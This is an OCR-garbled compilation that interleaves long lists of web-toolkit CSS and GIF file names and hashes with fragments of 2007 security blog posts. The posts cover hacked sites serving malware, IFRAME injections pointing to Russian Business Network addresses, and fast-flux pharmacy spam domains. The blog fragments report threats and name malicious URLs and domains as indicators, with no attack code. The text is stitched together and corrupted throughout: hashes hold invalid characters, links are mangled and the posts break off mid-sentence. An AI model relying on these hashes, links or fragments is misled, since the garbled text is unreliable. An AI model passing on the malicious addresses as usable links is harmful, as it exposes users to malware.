
c8dccd5ae528bc93569ac92e06ddb6bf2 
debug.css 
34d4d06d14f553f3b5b3834dd52bbfbb 
dialog.css 
67be46340dd2be9e72ebeb44532ab90b 
editor.css 
b913e6742a805181b9b9al17cbfd8a359 
form.css e66ce90a226b580317ebd8d7010e208b 
grid.css 7a23e101bd29fdb2a9c189e0346b771f 
layout.css 
1e8293852e5842ab63578cf06d55aela 
list-view.css 
a7efaadbd57025acb23467bbd385d4b8 
menu.css 86481961cc7ecc260609bae10a251fe7 
panel.css 
498902c8e484e3a3ded02f62211eb934 
progress.css 
f361a2cc4dcc76187a4c55e200098884 
qtips.css 

2d4b3e97948079e2a2dc74b3b20fcccf 
resizable.css 
060d9af3a2aa1306faa67087191796c2 
Slider.css 

d0994ed511leabbf1fd69fe4a1980f835 

tabs.css 714d6b271900b5ed455db1b403a3a7d4 
toolbar.css 
f583227e018671c66402bf437c65de7e 

tree.css 13db5b34b75c3b5da3986a5c94b260ac 
window.css 
957777d942734f3a265740837532b09f 
borders.css 
ef9dbb496cfca701294c325e15ae6a0c 

box.css 
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[6]Calipornication... Again 
[7]Bank of Ghana, others, compromised 
[8]Brookhaven National Labs hacked, serving porn 


Just yesterday for instance, F-Secure discovered [9]a phishing page hosted at India’s Police 
Academy site, and 

Sunbelt pointed out that Beer.ch [10]got IFRAME-ed with the following URLs belonging to the 
Russian Business Network who also IFRAME-ed Bank of India once : 


81.95.149.74/1/index.php 
81.95.149.74/22/index.php 


How is all this happening? In both, automated, and sometimes targeted way, where [11 ]auto- 
mated stands for remote file inclusion through botnets. 


| sure know all the pharmaceutical blockbusters now. 


Related posts: 


[12]Bank of India Serving Malware 

[13]U.S Consulate in St.Petersburg Serving Malware 
[14]Syrian Embassy in London Serving Malware 
[15]CISRT Serving Malware 


[16]Attack of the SEO Bots on the .EDU Domain 
[17]Malicious Keywords Advertising 


1. http: //ddanchev. blogspot .com/2007/07/malware-embedded-sites-increasing. htm 
2. http: //ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 
3. http: //ddanchev. blogspot .com/2007/09/examples-of-search-engine-spam.htm 


4. http://blog.trendmicro.com/collateral-damage3a-ca-county-site-redirects-to-porn2c-countermeasure-causes-m 


5. http: //blog.trendmicro. com/arizona-government-university-site3a—hacked21/ 

6. tp: / log. trendntcro.con/calipornication-again/ 

7, (ep 7 aoa songtaaapee ct 200171 ean oF tua sencea™coneeeaeaa ned 

8. hep: //sunbeltblog. blogspot. con/2007/10/rookhaven-natonal-Labs-hacked-serving Hal 
0, cee: / ser t-docarescou/cubteg arcusves/O0001200 weal 


. http: //sunbeltblog. blogspot. com/2007/10/nothing-is-scared-beer-site-hacked.htm 


. http: //ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines .htm 


12. http: //ddanchev.blogspot.com/2007/08/bank- of -india-serving-malware.htm 
http: //ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving. htm 


i 
nS 


. http: //ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving.htm 
15. http: //ddanchev.blogspot.com/2007/10/cisrt-serving-malware.htm 

. http: //ddanchev.blogspot.com/2007/01/attack-of-seo-bots-on-edu-domain. htm 
17. http://ddanchev.blogspot.com/2007/04/malicious-keywords-advertising.htm 
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721ea3cee0a652fa96ad4d5dd5423083 
button.css 
bc67739ff31c736e4ad1c792437bal4e 
combo.css 
6043cOeadf38ab692baae81f2d51dc4e 
core.css fdc5f00e36900f1c138d780e271f2655 
date-picker.css 
94ad6591d6e9f0853d1887d4436e5ad8 
dd.css 
57abee2ecda2567b1e6b402c589197b5 
debug.css 
206a67797eb753391ab72536d847a9d6 
dialog.css 
62ec3f2e111lae71d3e3e21ad44bbd666 
editor.css 
1e906a93695de0a0f2f5efab9cd27b42 
form.css 1f693356f81d46ab4a167cc9falc814a 
grid.css 7a0691f85f0cec0483df5d640eb93c17 
layout.css 
4676adc6df64919534d36636531849fb 
list-view.css 
7a080578ceccf634cfa233b3a2994499 
menu.css 93db73573c10f24d8afb1bcb7c2a0c90 
panel.css 
49456babbe9a87d3c8d98a7fb3095452 
pivotgrid.css 
ed0276fbe730d1a7b7f107977a2626a7 
progress.css 
d7b9961151d918babd2ec73033b8e3bd 
qtips.css 
6743c9c5b5239981c5dc2d2867fbc659 
resizable.css 
71a5ec7e897f4f2ddab9a77eac936f14 
slider.css 
f8d9647ee230bf43a42ab4f37bdffbb2 
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tabs.css 16ee16804ea7bb5a6d0c72576c7ddcf6 
toolbar.css 
15116e812f42922f2c5812269e3fd3d8 

tree.css fa25c98f7b9325db2c8c44630feb9c2e 
window.css 
47396edfebb6672a4176cefb9a5d05bf 
borders.css 
0c0d152f98b4d45ba46921b837b246d7 
box.css 
d9b07b142bacd23812fcd8bd9c3dedi1d 
button.css 
45463a7208c9e849af7c220cdb07bad3 
combo.css 
34e6a6f7212df2f8e4812d7e8Ff9820c1 

core.css e37769ef9a3c3943d2682f0eaf3dc293 
date-picker.css 
446bea8857e720b03edfae3f64ebba84 

dd.css 

05377cf262aa5dde544411fdcbcbb8fe 
debug.css 
01034e708a3c31df626d50f5f5b9f8f6 
dialog.css 
1e127e9fba0419799d9020c0a4b49383 
editor.css 
92edcd88d5b52b63a7151fb5a6226821 
form.css 1lbdda0ce6826e358f24cfc28899919b1 
grid.css 7129315c78a239979fdda255fab72812 
layout.css 
8484beb032e1283af895b5113d8e541f 
list-view.css 
b6923d2b37f7a271laldbceeda38ad708 
menu.css 78dblecef05048eb5fb816b9el1a7d016 
panel.css 
cbbc7f74d58ad4dd4810019344d65db4 
pivotgrid.css 
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7c6cc7846454cab3037b46ae1d723473 
progress.css 
3e83ac8a72c0c48aa2645e6a9e87699d 
qtips.css 

f5466ed0e2 7ecdb4d292c62718af7279 
resizable.css 
b02305bd24edbe6f00d1991592366c2b 
slider.css 
2d189de2568c5d7f74f37ed7ed613425 


tabs.css 438677c35b1b1277398a110169024e88 


toolbar.css 
e5f436912dcdbd0401d29532420e835f 


tree.css 70cd3e06edee733a4635161lelab6fc48f 


window.css 
2b86dd2df7c532608783221acf42faba 
corners-blue.gif 
86fd4c5664e0971bfc11959e8442604c 


corners.gif 
d2d1bc2085b369ce35ffd20c0121676e 
l-blue.gif 

ced9ffbf66ea39e7 7083a591f8257267 
l.gif 
c4d9dbbdc59ae06b5e9e72a6a865c981 
r-blue.gif 
82dbb522a80e3246f6297719371a9494 
r.gif 
bfle1d4a45f951ae656968a8c834f04a 
tb-blue. gif 
5535662e3fa79816a5807ale3fbc0520 
tb.gif 
dd3f63afe7ba90983ba73dad1cb66bf2f 
arrow. gif 
2017e55c7e3373c4fe8bd94f88733d79 
btn. gif 


640158406c1d733e0889a99794d3e3aa 
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group-cs.gif 
0286bd6ded1cc95f5f3d69bd248f628F 
group-Ir.gif 
0¢9757223b6623d441bb8b0e4c055b5e 
group-tb.gif 
058582c907fce9043fea31de75d219b5 
s-arrow-b-noline.gif 
8f44dd253df6ed9296547381525e6de3 
s-arrow-b.gif 
€4639771981c26bf369da4cf4f50fdc5 
s-arrow-bo.gif 
cf9d324ec6f356672b9164ef904dc0c4 
s-arrow-noline.gif 
7a53aflc3faba8a307e8d2df80a97066 
S-arrow-o.gif 
3750eea5746e770d3a9fe5f2b069a5c1 
s-arrow.gif 
d89899623ced59e7cb8d0f92a862a397 
tb-sprite. gif 
2f06a201cc19af3898682be9d59c12cd 
checkbox.gif 
75d685cab5665a935660a3d04f71c2be 
clear-trigger.gif 
62ebaf2b80a349ddc29395569670dfe4 
clear-trigger.psd 
267b814d154130dfféfcf605cd20f854 
date-trigger.gif 
8da29b063b12e38ef87f8c4fd6819F47 
date-trigger.psd 
5c086c04c9ab92a7444af6bcd8323da7 
error-tip-corners.gif 
364474276178c7b48b6270056b42b808 
exclamation. gif 
2a300a2b953665e3921laf0f2f04d26d8 
radio.gif 
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0239bdaef529be68530b86266a24742c 
search-trigger.gif 
9519bb03e6e9e4145b6d88d9af670af3 
search-trigger.psd 
5f1a4f1687f451df2622ac400b423777 
text-bg.gif 
8ac4eb92dc18ae3d481df525c8ael1452 
trigger-tpl.gif 
201986d6f51f8959cf62cf220ecd399b 
trigger.gif 
c60fb87efd3002e6af328c2e6fc916b1 
trigger.psd 
01b7b0392953106b99866d2c81228cbd 
arrow-left-white. gif 
b04e859bdcbd21ad1f06b8bfa7881df8 
arrow-right-white. gif 
714eb00f8134dde3a65c83f3f7lad2c4 
col-move-bottom.gif 
9c38bcb5ceeldc9b4ce64ad9ab1386f8 
col-move-top.gif 
€4584202d5172464050f675d396d1c6f 
columns.gif 
ef35242fa6514a81d17d5f700f561b7c 
dirty. gif 
8375fd45f9b0b575aa3aaad771129c71 


done.gif 365266930a93451414fe51ffc524a196 


drop-no.gif 
b53ca86d60fbcc7a45c8917299218bfd 
drop-yes.gif 
af96f4c3b32a470db2f38abb521b5c97 
footer-bg.gif 
65ed63e44c6149f1127ad3b4be4e0108 
grid-blue-hd.gif 
dd35d5c1202c440c2d1a945b335984d3 
grid-blue-split.gif 
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6902024f4d159b5bc8802a3920739f2F 
grid-hrow.gif 
55972a5063d80f35fb6b95a79bb0018a 
grid-loading.gif 
9ac6f737eb9b15272f12b00bfeb3c3c6 
grid-split.gif 
3ef419d4b9421d8e94f673a6238dc4c0 
grid-vista-hd.gif 
675f403e8a9cb5ab4bed725da9fe2023 
grid3-hd-btn.gif 
899efd3c8f35a0858bd926879e0claa9d 
grid3-hrow-over.gif 
b2f240bdc6cfcdf44e6b40456484da8ft 
grid3-hrow. gif 
51dc2be83a0c52739d4a4clald8ee5a4 
grid3-special-col-bg. gif 
28b360258aea8bbdefaab408411c49e3 
grid3-special-col-sel-bg.gif 
618d6dc340b8ed54a3966d602cdc9055 
group-by. gif 
3ff8c5936e358cf213227509c9bee95a 
group-collapse.gif 
cfbaf007a71ee5d5e4621d78abe7767c 
group-expana-sprite. gif 
8¢743339b24574ea945690c02f3e0006 
group-expand. gif 
10d97fa976e81b2a870cb96887067d7c 
hd-pop.gif 
e5f27a2f68cc2d13b11cf41c46d298dc 
hmenu-asc. gif 
048e0bc30f7c39d473dad5dabcbe03f2 
hmenu-desc.gif 
f0a987b34b003b25a7c82624d41f018a 
hmenu-lock.gif 
bcef18e25342c69c37c44dab87086065 
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hmenu-lock.png 
2a3b0b441834f443c1086930939efdae 
hmenu-unlock.gif 
8cc8205dafa587ef02d8a86903ae8074 
hmenu-unlock.png 
clf61df70b98c5498ea81le7e7b9effbb 
invalid _line.gif 
b445e47e595d58944e6f26d2a1b59ec8 
loading. gif 
00ef871b291bc03a497d608a5bd8ec99 
mso-hd.gif 
37fba9cO2f0eefe57f655890eef1c4al 
nowait.gif 
23c91166dbb16ba8655363321bf5a400 
page-first-disabled.gif 
7eb79becb23bf175aab3d3db30fcd4b9 
page-first.gif 
2895e6ca0b59ff203dcc08bd4b607a29 
page-last-disabled.gif 
a7bc34493cfc98c3f01a4d76607acb01 
page-last.gif 
cfcl12bb8081bc854b7e88d1855a206fa 
page-next-disabled. gif 
a8da67b9cd0245baf75efefd8dc2ce7f 
page-next.gif 
30d39a45f3b812f5500321060303e547 
page-prev-disabled.gif 
cbb6714346delccd9e99a96ae4e93edd 
page-prev.gif 
ce070b6dcc500b121276ee0af09ef5e4 
pick-button. gif 
b431fdf306fle2f033d0a431996de93f 
refresh.gif 
3bd48a4f798359elaec23f89487956f2 
row-check-sprite. gif 
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2d0aa7e501c3e6f97a97faf75e35d3c3 
row-expand-sprite. gif 
be81199d9d4fa69bef47a8f036a5a7d8 
row-over.gif 
f639094bd0560aefabc86e51a825f23d 
row-sel.gif 
ca87d6b950386edd5e17c985769d9101 
sort-hd.gif 
a02b9fc8101dfc79eb3935b7140b1cb9 
sort _asc.gif 
cf3f6095ed037f51f19d6852125c3e66 
sort _desc.gif 
82b1d9b0b128fabeddeb06ca4e473ad8 
wait.gif bOcd5a5dc070c705ebf8814a909802c3 
checked. gif 
cb7b3408df56f5585aaal242cd2f0b45 
group-checked.gif 
10627a0acb497683dfdfb71fe358a87d 
item-over.gif 
bb4cdc0ea257834cd5ed01f883387d8f 
menu-parent.gif 
6b3a0aa4543ff287ddcca29a956d3568 
menu.gif 6a6c4cce43b31cc1648409228c18ae94 
unchecked. gif 
31846118bddc7945b595ea2090589cf1 
corners-sprite. gif 
b4259d1f9b6216ecf2c8daf08dea742c 
left-right. gif 
64321e6172ab31dd527dfb1a0172dc94 
light-hd.gif 
abbd349f9ee8f509419e0cbb75f9fe21 
tool-sprite-tpl.gif 
e0449768cd5dce80b18fac904818ab33 
tool-sprites. gif 
d6b30b029db344309f4fe36630e2fe7a 
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tools-sprites-trans.gif 
8331513f15bd26be38974a7d7fc4ee41 
top-bottom.gif 
0031ad95b3d7e995ed2bf0efe94aa4a2 
white-corners-sprite.gif 
81f089d0247calad12093be21884d773 
white-left-right.gif 
64321e6172ab31dd527dfb1a0172dc94 
white-top-bottom.gif 
161¢232259b1c5842cc615f2886ec36e 
progress-bg. gif 
217008cd009f2554656f751fb126a293 
close.gif 
0379d036250096cae2e42b427b3df2e7 
tip-anchor-sprite.gif 
95f14dcee86ee7645 laea5eececdd11f 
tip-sprite. gif 
5ab1923b82d8f9da3ef9240a503d83a8 
glass-bg.gif 
7955022bfc847ccf3137a07fd185e207 
hd-sprite.gif 
d7c6552f517873d9a6c17de2ca817541 
left-btn.gif 
d8d5a36d7beeefb638c42ac13d7f0116 
right-btn.gif 
f805e95dd2faddd3961351673bddd8ce 
e-handle-dark.gif 
cc819d8e54c221ccb930d0193395ce54 
e-handle.gif 
1b2c52773128f8f52clece2b3699da82 
ne-handle-dark.gif 
0c045bd6c9eea8935dald8b61e0f2e60 
ne-handle.gif 
8f9265d391f107ad09dde609c5aca893 
nw-handle-dark.gif 
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db499e405cf82abb4233c2f4b3474375 
nw-handle.gif 
83307ffo614c6ec661793544edbba542 
s-handle-dark.gif 
130e80c1935071c760742ce273dc5f74 
s-handle.gif 
c866da0837dfb6fc3e3953e95d171457 
se-handle-dark.gif 
771b2705e670db9181a25fa7629b4933 
se-handle.gif 
6117c32b6f34d327f7e6cdde56a993al 
square. gif 
09e2e92a8e91b0957cb879d6b279971a 
sw-handle-dark.gif 
09ead7d2ae7c3e5796aea4294ac53e0d 
sw-handle.gif 

c67801cb356e8aa485 7fee86b4735bf6 
slider-bg.png 
0ed8c8978b333c667821533b518bbba2 
slider-thumb.png 
1c0586280ec1961f738dba46f464dc69 
slider-v-bg.png 
efecb3b4573e5db32cfe8911feb1389b 
Slider-v-thumb.png 
5a2751bce58ba2e72452b77c3c0f96fe 
scroll-left.gif 
felbf4a53043331009ad87c722af53aa 
scroll-right. gif 
16ab5e5f6526914400abc4aaa44a217d 
tab-btm-inactive-left-bg.gif 
39a63f0039d4033a3a3975f52cc91b6e 
tab-btm-inactive-right-bg.gif 
c46c58f6f557b584d0adac6c8cfllca6 
tab-btm-left-bg.gif 
d220cec098ceabeb6ebc43749a8df2a85 
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3.10.9 Fast-Flux Spam and Scams Increasing (2007-10-11 17:34) 


59,149.47,103 


4.10.107 
37 164,154 
149,149 


20.66.55 


As | pointed out in my last series of posts assessing pharmaceutical scams and phishing 
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campaigns, both, [1]botnet masters, [2]pharma masters, and [3]rock phishers, are starting to 
take advantage of fast-flux networks to make it harder to trace back and shut down their 
operations. Here’s [4]a related article on the topic : 


"With fast-flux, spammers continually change the URL in the e-mail to counter filtering efforts. 
The constant change requires a corresponding defense that recognizes those changes as they 
occur, Red Condor Officials said. Fast-flux botnets turn IP addresses against anti-spammers. 
Using a large number of servers, fast-flux DNS uses a compromised PC as a proxy, frustrating 
investigators. In its September intelligence report, MessageLabs counted fast-flux DNS 
techniques as one of the key reasons botnets are hard to shut down. The MySpace worm that 
compromised thousands of MySpace users’ sites earlier this year utilized fast-flux techniques." 
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Let’s showcase this emerging trend. Take for instance some recently spammed .cn domains 
such as considerjust.cn and pageagainst.cn advertising a Canadian Pharmacy scam. The 
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tab-btm-right-bg. gif 
236dde0e017b4b6014c2e7e463eea83a 
tab-close.gif 
63d06eb92be6a183a9c55c603e8ca247 
tab-strip-bg.gif 
e462bdff6426b8b75445d34c2f0b1b32 
tab-strip-btm-bg.gif 
1b4f0d679f93e4b435141ad3851e85ba 
tabs-sprite. gif 
6889feOdf8cebda66df45b79917f82ff 
bg.gif 
46dc6e0bdc0db4288eca517b3901d30f 
btn-arrow-light.gif 
fa49b39a0fd88ef26264da44a2b4edea 
btn-arrow. gif 
12bda29a4c8016cfa047e852c4353f59 
btn-over-bg. gif 
faddf9b24cefa721326ba3f87f3ef31f 
gray-bg.gif 
cf2d9408f320e696e607d8472afa7ffO 


more.gif a054a99e666736e6024b199d775496e6 


s-arrow-bo.gif 
34871d1247f9f6a66075280a83ba8045 
tb-btn-sprite.gif 
ba0a5d77db72942782fc4bf23f710738 
tb-xl-btn-sprite. gif 
3ffd5589b41889230755ea2108cc0e92 
tb-xl-sep.gif 
06e026387e2dd0f49e88a04791cf26fa 
arrows. gif 
812d6b6249dbe4e14bd4dc39ca5d5a35 
drop-add.gif 
95eb34ac70ala3c95ef39ab826a89491 
drop-between.gif 
edb544a0de58547d4a39c526e06e3c82 
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drop-no.gif 
67f83ea04a2eb1c50614a96faf625f25 
drop-over.gif 
d6b303cfa3de8784057d9d7e66cdaa8s6 
drop-under.gif 
55e5dbc9451cfa91423832260b0753aa 
drop-yes.gif 
f3216326c00890259e84f1726dd1043f 
elbow-end-minus-nl. gif 
17a7d43dd075b5492f5b100b843d9a69 
elbow-end-minus.gif 
3b6c1a4d82e1cd7550d434a5de68272e 
elbow-end-plus-nl.gif 
8d0a7968c886c688345390eda36916e8 
elbow-end-plus. gif 
fObd989de6d8aaft9I29a17199d5037cb 
elbow-end.gif 
345551384aa325189ba28a1c20f3405e 
elbow-line.gif 
90e478158df476dc989ab60daaafc87e6 
elbow-minus-nl. gif 
17a7d43dd075b5492f5b100b843d9a69 
elbow-minus.gif 
747d2a7db5892f4cdf8410162f82e960 
elbow-plus-nl.gif 
8d0a7968c886c688345390eda36916e8 
elbow-plus.gif 
e0814bcef2 9fff7 1fb8afdaf9cee20c4 
elbow.gif 
27679f3b1222ba95d9925885d7d82d02 
folder-open.gif 
9bfae2911dab36876ba5318f31e5a61d 
folder. gif 
4fbad3291ab5c0c403c745b7ae4c6d2c 


leaf.gif 23757d6e353f343e3c7edfe28428f198 
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loading. gif 
00ef871b291bc03a497d608a5bd8ec99 
s.gif 
fc94fb0c3ed8a8f909dbc7630a0987 ff 
icon-error.gif 
1b6b5d82f6880dcf2879d3bc747d478f 
icon-info. gif 
d2ad9d2695921a20d1aa7ca438ad942d 
icon-question. gif 
46e130b52d0acee85c32129f5662be93 
icon-warning.gif 
098f546831e7c993752ca4fdb97e36bc 
left-corners.png 
aa363ff2fa63f16d1129dfe087efa53b 
left-right.png 
0b542de3515ed87146b9f5c9ab03e396 
right-corners.png 
6bfeecf29c2e0c3f77506b94c739e468 
top-bottom.png 
01f0f606b947a4bc22b00alb6acc7caa 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
s.gif 
fc94fb0c3ed8a8f909dbc7630a0987 ff 
shadow-c.png 
7ab6163237099f2529452b88953a4049 
shadow-Ir.png 
986270d8ab4330fa7499dc33ed135598 
shadow.png 
860bf4f690d2ea2aba7b11500925da62 
corners-blue.gif 
86fd4c5664e0971bfc11959e8442604c 
corners.gif 
d2d1bc2085b369ce35ffd20c0121676e 
l-blue.gif 
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ced9ffbf66ea39e7 7083a591f8257267 


l.gif 
c4d9dbbdc59ae06b5e9e72a6a865c981 
r-blue.gif 
82dbb522a80e3246f6297719371a9494 
r.gif 
bfle1d4a45f951ae656968a8c834f04a 
tb-blue.gif 
7c4b19eb682afdclbde0640d2321fb25 
tb. gif 
dd3f63afe7ba90983ba73dad1cé6é6bf2f 
arrow.gif 
44b6dbf385236a2697932a7a3e20b4a0 
btn.gif 
40ac871755023cc1lad15dcd77b54dbf 
group-cs.gif 
5dc0252bd9ecf72f98d858427054cf08 
group-Ir.gif 
cb7813012d6be17e083835d60037029e 
group-tb.gif 


4edf9b7db13b1331282eed298384cab9 
s-arrow-b-noline.gif 
30d04f652551f1df9d59d33a99c9a320 
s-arrow-b.gif 
a957a6d618d19b92a2d1a7a1b50f5235 
s-arrow-bo.gif 
53a15d7907a017122f7f60402c435753 
s-arrow-noline.gif 
13f08a275c58135365b8e58b3177abla 
S-arrow-o.gif 
5005d8dea2f9456aaf2ab27ca7bf5651 
S-arrow.gif 
bc71296ddf9c7ef5aa56b09ca3512c8a 
drop-add.gif 
95eb34ac70ala3c95ef39ab826a89491 
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drop-no.gif 
ae536c37391ba78143b5c8283cec8d13 
drop-yes.gif 
f3216326c00890259e84f1726dd1043f 
tb-sprite.gif 
a2f06caddc2fb729db5cbbd874491128 
checkbox. gif 
75d685cab5665a935660a3d04f71c2be 
clear-trigger.gif 
97b3e5e9edf27b50d63d48098c2fleae 
clear-trigger.psd 
€8c2d843458728df5c184a54862c5946 
date-trigger.gif 
30b5bace9f3dac358716c1415270f874 
date-trigger.psd 
3f10ecf0d961006507d043f9b9fce45e 
error-tip-corners.gif 
364474276178c7b48b6270056b42b808 
exclamation.gif 
37dbe02e3cbde0f6780650bfd8535e38 
radio. gif 
0239bdaef529be68530b86266a24742c 
search-trigger.gif 
559ef372cf27a38678d84e8c0b7237fc 
search-trigger.psd 
daacfb6d450b8cd56da5905db4c8b8c0 
text-bg.gif 
d5ba54c1f417e6a72cbce8b909078727 
trigger-square.gif 

clcbaecc91209f7 7e2d20235c137el3e 
trigger-square.psd 
5e66abd0fal313bd052db7d121f626c1 
trigger-tpl.gif 
d7be20f0dc38f4f46cd318fe32cf3ce3 
trigger.gif 
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447d5b600f7527f5c8cc49e7453bbb27 
trigger.psd 
513a8c601e278a35a3cb3272fd1769df 
arrow-left-white.gif 
b04e859bdcbd21ad1f06b8bfa7881df8 
arrow-right-white.gif 
714eb00f8134dde3a65c83f3f71ad2c4 
col-move-bottom.gif 
9c38bcb5ceeldc9b4ce64ad9ab1386f8 
col-move-top.gif 
€4584202d5172464050f675d396d1c6f 
columns.gif 
ef35242fa6514a81d17d5f700f561b7c 
dirty. gif 
decca3b96e2c37cfoeb04ddb0d9f669b 
done.gif 365266930a93451414fe51ffc524a196 
drop-no.gif 
b53ca86d60fbcc7a45c8917299218bfd 
drop-yes.gif 
af96f4c3b32a470db2f38abb521b5c97 
footer-bg.gif 
65ed63e44c6149f1127ad3b4be4e0108 
grid-blue-hd.gif 
dd35d5c1202c440c2d1a945b335984d3 
grid-blue-split.gif 
0494ba49974ff2bc1bf81le1d82dfee18 
grid-hrow.gif 
55972a5063d80f35fb6b95a79bb0018a 
grid-loading.gif 
9ac6f737eb9b15272f12b00bfeb3c3c6 
grid-split.gif 
3ef419d4b9421d8e94f673a6238dc4c0 
grid-vista-hd.gif 
675f403e8a9cb5ab4bed725da9fe2023 
grid3-hd-btn.gif 
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e3e77072c16a6b27556236961f29c552 
grid3-hrow-over.gif 
a92d8f6c106943995720f2884634670e 
grid3-hrow.gif 
3e4484ea8db10af1320808c8477346ea 
grid3-rowheader.gif 
b4491705564909da7f9eaf749dbbfbb1 
grid3-special-col-bg.gif 
c9df03a1c107360128da89fa47066405 
grid3-special-col-sel-bg.gif 
a94039f89dec164896ceffifbdf6dbc5 
group-by.gif 
3ff8c5936e358cf213227509c9bee95a 
group-collapse.gif 
fd6a72ffa784170d83f9f13322266ca8 
group-expand-sprite.gif 
d0f614a387292177f3acb0c95a4cd760 
group-expand.gif 
8a9ad3ed3d74c2911b7f101268a1843b 
hd-pop.gif 
e5f27a2f68cc2d13b11cf41c46d298dc 
hmenu-asc.gif 
048e0bc30f7c39d473dad5dabcbe03f2 
hmenu-desc.gif 
f0a987b34b003b25a7c82624d41f018a 
hmenu-lock.gif 
bcef18e25342c69c37c44dab87086065 
hmenu-lock.png 
2a3b0b441834f443c1086930939efdae 
hmenu-unlock.gif 
8cc8205dafa587ef02d8a86903ae8074 
hmenu-unlock.png 
clf61df70b98c5498ea81le7e7b9effbb 
invalid _line.gif 
04a88e97b56e8a8ece4a66d49cc 78828 
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loading.gif 
00ef871b291bc03a497d608a5bd8ec99 
mso-hd.gif 
37fba9cO2f0eefe57f655890eef1c4al 
nowait.gif 
23c91166dbb16ba8655363321bf5a400 
page-first-disabled.gif 
8d3185028c541cbcce67b5909c04824e 
page-first. gif 

16ecO00fa7 70d860b768cf5034ddfca96 
page-last-disabled. gif 
1d123237ceeb5109a1b9274f0cf19d73 
page-last.gif 
ef524dd0b8dfe4eefecffaalcObb8edd 
page-next-disabled.gif 
0f4b8681772c91921fa93ede9c755ea0 
page-next.gif 
f6f9d2209dfc99912ffc9848d97646db 
page-prev-disabled. gif 
eefcbed15c8d37a89618b08f7b224297 
page-prev.gif 
80daad880483eed682b22ec70514ecc4 
pick-button.gif 
b431fdf306fle2f033d0a431996de93f 
refresh-disabled. gif 
105c62973ba69710bc2b41b443af5198 
refresh. gif 
fla2e7df30394c5a30bc76c2d09013b7 
row-check-sprite.gif 
2d0aa7e501c3e6f97a97faf75e35d3c3 
row-expand-sprite.gif 
be81199d9d4fa69bef47a8f036a5a7d8 
row-over.gif 
f639094bd0560aefabc86e51a825f23d 
row-sel.gif 
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ca87d6b950386edd5e17c985769d9101 
sort-hd.gif 
2640addef6e987b4c5dfa4c8c2dfb10c 
sort _asc.gif 
2352874b5f636ca331fe9509a2f9bdd7 
sort _desc.gif 
d104fcf119d40c51554ddb8b377142e5 


wait.gif bOcd5a5dc070c705ebf8814a909802c3 


collapse. gif 
dfcec0803d488a783916c750fd83a897 
expand.gif 
c9c9b0ea5311c3dc016c69dc234912bc 
gradient-bg.gif 
e117fca9d088e4cd5bbbcec7b99a8408 
mini-bottom.gif 
ae8e3674fd32997dc5217d5d6199a5a5 
mini-left. gif 
8654fdb45ecf4406af2fceld3beb7596 
mini-right.gif 
cbdf9fb0c45466b4217ac9f7bd6a9ed4 
mini-top.gif 
fod91e98576f66fd2702495251b15240 
ns-collapse.gif 
efa9fbd7alf3f0f1f22360391e16126f 
ns-expand. gif 
dalf9d40c091d3b6dc7a8dee4fc02ac6 
panel-close.gif 
b185da1837344529bfb684a96d8371b5 
panel-title-bg.gif 
b66384c309a397963389a76b07e9ecd4 
panel-title-light-bg.gif 
688d3a263442db125dal70e5d3aebf70 
stick. gif 
be9e67ae0b61b01cfd15928ca7a3da51 
stuck.gif 
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745e0cacb51250ea0216efc4alcb50cb 
tab-close-on.gif 
0ae2c978e85391a69f0dce8dal8d8b23 
tab-close.gif 
f92107cc6b4cb78af084648a628e01d2 
checked. gif 
cb7b3408df56f5585aaal242cd2f0b45 
group-checked. gif 
£7973443d91e5e074013f1b07ee79479 
item-over.gif 
bb4cdc0ea257834cd5ed01f883387d8f 
menu-parent.gif 
d303ad7e3ced891736e80f77e1ld4e51d 
menu.gif ael28d5f3f3a39213f3d4e23aec8728f 
unchecked. gif 
31846118bddc7945b595ea2090589cf1 
corners-sprite. gif 
d4546c86ed835fee767212279ee98b68 
left-right. gif 
6553647bad54d83e2c235f339d12f6be 
light-hd.gif 
b058affcc8b3e8a03be74bc9d9697da7 
tool-sprite-tpl.gif 
e0449768cd5dce80b18fac904818ab33 
tool-sprites. gif 
75106d9a5ffab255a5bb3792a2a16e16 
tools-sprites-trans. gif 
8331513f15bd26be38974a7d7fc4ee41 
top-bottom.gif 
a4854e1b3aea60123522cb687a462c05 
top-bottom.png 
2a65a27def756a0951644b511f6f2cce 
white-corners-sprite. gif 
81f089d0247calad12093be21884d773 
white-left-right. gif 
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domains have an allocated space of IPs to rotate on each and every request to them, 
something you can easily verify by pinging them and see how their IPs change on every new 
ping in coordination with the allocated IP table you can see in the screenshot. It gets even 
more interesting, especially in terms of locating the main fast-flux domain, in this case it’s 


mainseven.com, a central point for [5]a great deal of other [6]pharma domains in its fast-flux. 
Here are graphs of fast-flux spam and scam networks : 


+) = 
’ 
’ 
wr 


[7]mainseven.com 
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77a6389c6737ad507ca5330ad8816524 
white-top-bottom.gif 
f865d7237bff3c45fd4a8c448f97d236 
progress-bg. gif 
fd75abcd9d1cb8534f24f438a71e6fd8 
bg.gif 
49c0a530cc16357bb39d51c13065a88f 
close.gif 
0379d036250096cae2e42b427b3df2e7 
tip-anchor-sprite.gif 
f39bc3283b69431ce6e7aed2fe6882b9 
tip-sprite. gif 
090b2d83952e682fab43b2ab16be2991 
blue-loading. gif 
dc2fd7c0ed853c56b4ac65710af3bd0a 
calendar.gif 
81296cff1f97f5365524f2b9dcf626da 
glass-bg.gif 
bc2cd5c5ac9b3874d956c892d23f2119 
hd-sprite.gif 
6a54ae98bef53397d52282201852c204 
large-loading.gif 
d96f6517e00399c37a9765e045eaaf22 
left-btn.gif 
6bf30c6cf0b5d70436c3e463b5532b35 
loading-balls.gif 
ac062b94ed674aaa50a6c18df92acdf3 
right-btn.gif 
e7ad3a7f4814791cecflb90e77e9e139 
warning. gif 
448dc934a7f0dd6092b51f88ale47b2d 
e-handle-dark.gif 
b86289f41d7ad1a7401dd2b2a9b3c3d8 
e-handle.gif 
510edc95ebaa36306916c50ca10596f7 
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ne-handle-dark.gif 
115f71b851c7f0b5f354caa7b8dfff15 
ne-handle.gif 
8e268b962dc909d275997b572ff17a72 
nw-handle-dark.gif 
4a361e6920b2e34a39fd425a515c83b9 
nw-handle.gif 
1120600505249c38c3d1cc2ab120cd13 
s-handle-dark.gif 
4a6bf15d308a4ae580dd03cbd431a95c 
s-handle.gif 
5e3338cb09e9df7f52383d6b1423fc86 
se-handle-dark.gif 
f3d8d8aac23e3e9633072e2366cda847 
se-handle.gif 
71edc3f63f79f447d2c81ee09elfbbc3 
